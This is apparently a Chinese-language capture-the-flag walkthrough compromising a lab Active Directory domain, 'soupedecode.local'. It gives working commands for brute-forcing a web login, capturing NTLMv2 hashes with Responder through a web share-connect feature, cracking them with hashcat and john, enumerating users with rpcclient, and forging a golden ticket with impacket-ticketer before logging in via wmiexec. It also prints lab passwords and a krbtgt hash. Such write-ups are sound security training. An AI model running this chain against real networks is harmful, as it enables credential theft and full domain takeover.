image-20250509190129632

端口扫描

给扫到的域名加入hosts文件

image-20250509191035192

SMB (445)
Kerberos (88)
LDAP (389, 3268)
RPC (135, 593)
DNS (53)
暂时都利用失败

80端口服务目录扫描

image-20250509193334767

找到新的域名加入host文件

image-20250509194503195

http://heartbeat.soupedecode.local/login.php

image-20250509195653491

对登陆页面进行测试

爆破出密码:

admin/nimda

image-20250509204621351

使用responder进行欺骗尝试拿到hash

responder -I eth1 -Pdv

下面是详细的解释:

Web 应用的功能: 登录后的 Web 页面 (http://heartbeat.soupedecode.local:8080/login.php 成功登录后跳转的页面) 提供了一个 "Network Share Connect" 功能。这意味着这个页面背后的服务器端代码(很可能是 PHP)会接收你输入的 IP 地址,并尝试从目标服务器 (192.168.56.126) 发起一个网络共享连接到你提供的 IP 地址。

输入攻击机 IP: 当你输入 192.168.56.103 (你的 Kali 攻击机 IP) 并提交时,目标服务器 (192.168.56.126) 上的 Web 应用代码被指示要去连接 \\192.168.56.103\(或者类似的 SMB/CIFS 路径)。

目标服务器发起连接和认证: 目标服务器的操作系统(或者运行 Web 应用/执行连接的用户账户)尝试按照指令连接到你攻击机的 SMB 服务 (通常是 445 端口)。在尝试建立连接时,Windows 系统会自动使用当前运行发起连接的进程的用户的凭据进行 NTLM 认证 尝试。

Responder 扮演流氓 SMB 服务器: 在你的 Kali 机器上,Responder 正在运行并监听 eth1 接口上的各种服务,包括 SMB (端口 445)。当目标服务器尝试连接到你的 192.168.56.103:445 时,Responder 冒充一个合法的 SMB 服务器接收了这个连接。

捕获 NTLM 哈希: 当目标服务器发起 NTLM 认证尝试时,它发送了用户名、域名、质询和计算出的响应。Responder 的流氓 SMB 服务器接收到这些信息,并立即将其记录和显示出来,这就是你捕获到的 NTLMv2 哈希。

image-20250509204605620

爆破

hashcat -m 5600 -a 0 test.txt /usr/share/wordlists/rockyou.txt

image-20250509213517915

websvc/jordan23

然后就卡着了远程登陆不成功

smb也失败了

是密码过期了

直接去改一下就好了这里改为了jordan123

crackmapexec smb 192.168.56.128 -u 'websvc' -p 'jordan123' --shares
smbmap -H 192.168.56.128 -u websvc -p jordan123

image-20250510212853293

在websvc桌面找到user.txt

image-20250510213955738

rtina979不让查看内容

应该就是在这里了

利用rpc查看rina979的密码

rpcclient -U SOUPEDDECODE.LOCAL/websvc%jordan123 192.168.56.126 -c "querydispinfo" | grep rtina979

image-20250510215434446

密码也过期了

改为myift123

继续smb信息收集

Report.rar 压缩包,下载之后发现需要密码

rar2john + john

rar2john report.rar > report.txt  
提取文件hash
john report.txt --wordlist=/usr/share/wordlists/rockyou.txt
爆破hash

0f55cdc40bd8f5814587f7e6b2f85e6f

image-20250523141539871

得到密码为

PASSWORD123

得到htm文件

的到krbrgt的hash

image-20250523142626324

image-20250523153203002

hash是正确的

黄金票据攻击

我们要想伪造黄金票据还需要得到域的sid

Domain SID is: S-1-5-21-2986980474-46765180-2505414164

image-20250523154021693

ntpdate -n soupedecode.local
ntpdate -u 192.168.56.126

同步时间

创建文件

/etc/krb5.conf

[libdefaults]
    default_realm = SOUPEDECODE.LOCAL

[realms]
    SOUPEDECODE.LOCAL = {
        kdc = dc01.soupedecode.local
        admin_server = dc01.soupedecode.local
    }

[domain_realm]
    soupedecode.local = SOUPEDECODE.LOCAL
    .soupedecode.local = SOUPEDECODE.LOCAL

export KRB5_CONFIG=/etc/krb5.conf    
impacket-ticketer -nthash 0f55cdc40bd8f5814587f7e6b2f85e6f -domain-sid S-1-5-21-2986980474-46765180-2505414164 -domain SOUPEDECODE.LOCAL administrator
export KRB5CCNAME=administrator.ccache
impacket-wmiexec soupedecode.local/administrator@dc01.soupedecode.local -k -target-ip 192.168.56.126

image-20250524152624989